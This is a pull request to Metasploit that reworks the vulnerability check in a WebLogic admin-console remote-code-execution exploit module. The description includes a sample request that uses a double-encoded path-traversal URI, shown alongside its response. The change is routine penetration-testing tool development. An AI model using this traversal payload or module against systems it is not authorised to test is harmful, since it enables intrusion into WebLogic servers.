### PR TITLE
Enhance exploit/multi/http/weblogic_admin_handle_rce check

### DIFF
--- a/modules/exploits/multi/http/weblogic_admin_handle_rce.rb
+++ b/modules/exploits/multi/http/weblogic_admin_handle_rce.rb
@@ -171,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    vprint_status("Executing command: #{cmd}") unless cmd.empty?
+    vprint_status("Executing command: #{cmd}")
 
     send_request_handle(coherence_gadget_chain(cmd))
   end

--- a/modules/exploits/multi/http/weblogic_admin_handle_rce.rb
+++ b/modules/exploits/multi/http/weblogic_admin_handle_rce.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = execute_command('')
+    res = send_request_handle(rand_text_alphanumeric(8..42))
 
     unless res
       return CheckCode::Unknown('Target did not respond to check.')
@@ -135,7 +135,13 @@ class MetasploitModule < Msf::Exploit::Remote
       raise RuntimeError
     end
 
-    unless res.code == 302 && res.body.include?('UnexpectedExceptionPage')
+    # HTTP/1.1 302 Moved Temporarily
+    # [snip]
+    # Location: http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=UnexpectedExceptionPage
+    # [snip]
+    unless res.code == 302 &&
+           res.redirection.path == '/console/console.portal' &&
+           res.redirection.query.include?('_pageLabel=UnexpectedExceptionPage')
       return CheckCode::Safe('Path traversal failed.')
     end
 
@@ -167,11 +173,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}") unless cmd.empty?
 
+    send_request_handle(coherence_gadget_chain(cmd))
+  end
+
+  def send_request_handle(handle)
     send_request_cgi(
       'method' => 'POST',
       'uri' => aperture_science_handheld_portal_device,
       'vars_post' => {
-        'handle' => coherence_gadget_chain(cmd)
+        'handle' => handle
       }
     )
   end


### PR DESCRIPTION
```
msf6 exploit(multi/http/weblogic_admin_handle_rce) > check

####################
# Request:
####################
POST /console/css/.%252e/console.portal HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

handle=5gylXO6L0gDpYsO0ybKOMEYlewgKvqJ0te
####################
# Response:
####################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache,no-store,max-age=0, no-cache,no-store,max-age=0
Date: Thu, 10 Dec 2020 03:11:02 GMT
Pragma: No-cache, No-cache
Location: http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=UnexpectedExceptionPage
Content-Length: 385
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Frame-Options: SAMEORIGIN, SAMEORIGIN
Set-Cookie: ADMINCONSOLESESSION=xR5KoW_9RQk52AbuvAYAV4HUvSIxcOpbWxKSIiCfP2aKgoeRefrP!-1995002420; path=/console/; HttpOnly

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved
temporarily.</p>
<p>It's now at <a href="http://127.0.0.1:7001/console/console.portal?_nfpb=true&amp;_pageLabel=UnexpectedExceptionPage">http://127.0.0.1:7001/console/console.portal?_nfpb=true&amp;_pageLabel=UnexpectedExceptionPage</a>.</p>
</body></html>

[+] 127.0.0.1:7001 - The target is vulnerable. Path traversal successful.
msf6 exploit(multi/http/weblogic_admin_handle_rce) >
```

Updates #14324.